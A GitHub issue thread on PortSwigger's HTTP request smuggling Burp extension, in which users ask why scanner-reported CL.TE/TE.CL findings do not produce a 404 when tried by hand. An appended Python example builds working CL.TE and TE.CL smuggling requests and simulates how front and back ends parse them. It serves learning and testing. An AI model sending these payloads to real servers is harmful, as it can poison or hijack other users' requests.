PortSwigger / http-request-smuggler

https://portswigger.net/blog/http-desync-attacks

Not able to get "404" status code after smuggling the attack through (TE.CL & CL.TE)? #18

Closed anshumanpattnaik closed 4 years ago

anshumanpattnaik commented 4 years ago

Burp reports one issue saying that "http://redacted.com" is vulnerable to "HTTP Request Smuggling", but when I try to smuggle the attack (TE.CL & CL.TE) there is no "404" status in the response.

Burp tries to exploit this with different smuggling techniques:

HTTP Request Smuggling: CL.TE aposed (delayed response)
HTTP Request Smuggling: CL.TE quoted (delayed response)
HTTP Request Smuggling: TE.CL 0dwrap
HTTP Request Smuggling: CL.TE gareth1
HTTP Request Smuggling: CL.TE aposed left-alive
HTTP Request Smuggling: CL.TE nested left-alive
HTTP Request Smuggling: CL.TE quoted left-alive
HTTP Request Smuggling: CL.TE suffix1:127 left-alive
HTTP Request Smuggling: CL.TE spacefix1:127 left-alive

Is it vulnerable to this attack?

Thanks

albinowax commented 4 years ago

I can't provide per-target support, but I suggest you read https://portswigger.net/blog/http-desync-attacks-request-smuggling-reborn and https://portswigger.net/research/http-desync-attacks-what-happened-next

DoubleDeckerMilton commented 4 years ago

Burp is giving me an HRS indication on sites, like "CL.TE left alive delayed response".

I have watched your presentation, done the labs at PortSwigger, and read all the blogs I could find on PortSwigger as well as on other forums; I also watched @defparam's talk at @nahamcom on the same topic, but I am not getting a poisoned response back, and what does Burp Suite mean by "delayed response" and "left-alive"?

Burp tries to exploit this with different smuggling techniques:

HTTP Request Smuggling: CL.TE aposed (delayed response)
HTTP Request Smuggling: CL.TE quoted (delayed response)
HTTP Request Smuggling: TE.CL 0dwrap
HTTP Request Smuggling: CL.TE gareth1
HTTP Request Smuggling: CL.TE aposed left-alive
HTTP Request Smuggling: CL.TE nested left-alive
HTTP Request Smuggling: CL.TE quoted left-alive
HTTP Request Smuggling: CL.TE suffix1:127 left-alive
HTTP Request Smuggling: CL.TE spacefix1:127 left-alive

Thanks @albinowax, your presentations are amazing; I just watched CORS, Desync, and Cracking Lens.
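Both questions in this thread describe the same situation: the scanner reports CL.TE / TE.CL findings, but a hand-built attack never turns the next response into a 404. The example below is added here and is not code from the http-request-smuggler extension or from anyone posting in this thread. It builds the two classic attack requests with the Content-Length and chunk-size values computed from the payload instead of typed by hand, then pushes them through two toy parsers, one honouring Content-Length and one honouring Transfer-Encoding, to show which bytes each hop consumes and why the request that follows on the same connection becomes GET /404. The host name, the victim request and the smuggled prefix are placeholders, not real targets. If the expected request line does not come out of the back-end model, the length fields in the attack are wrong before the target is even involved.

```python
# Added example: it is not code from the http-request-smuggler extension or
# from anyone in this thread. It builds the classic CL.TE and TE.CL requests
# that smuggle a "GET /404" prefix, then replays them through two toy parsers
# to show which bytes each hop consumes and why the *next* request on the
# connection turns into the 404. Host name, victim request and prefix are
# placeholders, not real targets.
from typing import Tuple

CRLF = b"\r\n"


def read_request(stream: bytes, prefer: str) -> Tuple[bytes, bytes]:
    """Consume one HTTP/1.1 request from `stream` the way a parser that
    honours `prefer` ("CL" or "TE") would. Returns (request, leftover).
    Raises ValueError if the bytes do not yet hold a complete request."""
    head, sep, rest = stream.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("incomplete headers")
    headers = {}
    for line in head.split(CRLF)[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower()] = value.strip()
    chunked = headers.get(b"transfer-encoding", b"").lower() == b"chunked"
    content_length = int(headers.get(b"content-length", b"0"))

    if prefer == "TE" and chunked:
        # Walk the chunks: <hex size>CRLF <data>CRLF ... 0CRLF CRLF
        pos = 0
        while True:
            end = rest.index(CRLF, pos)
            size = int(rest[pos:end].split(b";")[0], 16)
            pos = end + 2
            if size == 0:
                pos = rest.index(CRLF, pos) + 2  # empty trailer section
                break
            pos += size + 2                      # chunk data plus its CRLF
        body_len = pos
    else:
        body_len = content_length                # CL wins, or there is no TE

    if len(rest) < body_len:
        raise ValueError("incomplete body")
    return head + b"\r\n\r\n" + rest[:body_len], rest[body_len:]


def build_cl_te(host: bytes, smuggled: bytes) -> bytes:
    """CL.TE: the front end honours Content-Length and forwards everything;
    the back end honours Transfer-Encoding, stops at the 0-size chunk and
    leaves `smuggled` sitting on the connection."""
    body = b"0\r\n\r\n" + smuggled
    return (b"POST / HTTP/1.1\r\n" +
            b"Host: " + host + CRLF +
            b"Content-Length: %d\r\n" % len(body) +  # must cover the whole body
            b"Transfer-Encoding: chunked\r\n\r\n" + body)


def build_te_cl(host: bytes, smuggled_head: bytes, bite: int = 3) -> bytes:
    """TE.CL: the front end honours Transfer-Encoding and forwards the whole
    chunked body; the back end honours Content-Length, reads only the chunk
    size line and leaves the smuggled request plus the chunk tail on the
    connection. The smuggled request gets a Content-Length that swallows that
    tail plus `bite` bytes of the victim's request, so it stays incomplete
    until the victim's bytes arrive and the victim receives its response."""
    tail = b"\r\n0\r\n\r\n"                    # end of chunk data, then the 0-size chunk
    smuggled = smuggled_head + b"\r\nContent-Length: %d\r\n\r\n" % (len(tail) + bite)
    size_line = b"%x\r\n" % len(smuggled)
    body = size_line + smuggled + tail
    return (b"POST / HTTP/1.1\r\n" +
            b"Host: " + host + CRLF +
            b"Content-Length: %d\r\n" % len(size_line) +  # back end reads just "<hex>\r\n"
            b"Transfer-Encoding: chunked\r\n\r\n" + body)


def second_request_seen_by_back_end(attack: bytes, victim: bytes,
                                    front: str, back: str) -> bytes:
    """Model a front end (`front` rule) forwarding to a back end (`back` rule)
    over a reused connection. Returns the request line of the second request
    the back end parses once `victim` arrives."""
    forwarded, unread = read_request(attack, front)
    if unread:
        raise ValueError("front end would see a second request in the attack")
    _, leftover = read_request(forwarded, back)  # bytes the back end did not consume
    second, _ = read_request(leftover + victim, back)
    return second.split(CRLF, 1)[0]


if __name__ == "__main__":
    host = b"target.example"                     # placeholder, not a real target
    victim = b"GET / HTTP/1.1\r\nHost: " + host + b"\r\n\r\n"
    cl_te = build_cl_te(host, b"GET /404 HTTP/1.1\r\nFoo: x")
    te_cl = build_te_cl(host, b"GET /404 HTTP/1.1\r\nHost: " + host)
    print(second_request_seen_by_back_end(cl_te, victim, "CL", "TE"))  # b'GET /404 HTTP/1.1'
    print(second_request_seen_by_back_end(te_cl, victim, "TE", "CL"))  # b'GET /404 HTTP/1.1'
    print(second_request_seen_by_back_end(cl_te, victim, "CL", "CL"))  # b'GET / HTTP/1.1'
```

The third call is the control: when both hops apply the same rule nothing is left on the connection and the victim's own request line comes back, which is what a non-vulnerable target looks like. The model deliberately uses plain, unobfuscated headers; the variant names in the scanner output (aposed, quoted, 0dwrap, and so on) are different header permutations the extension tries, so a target that only desyncs under one of those permutations will not be reproduced by sending these requests verbatim.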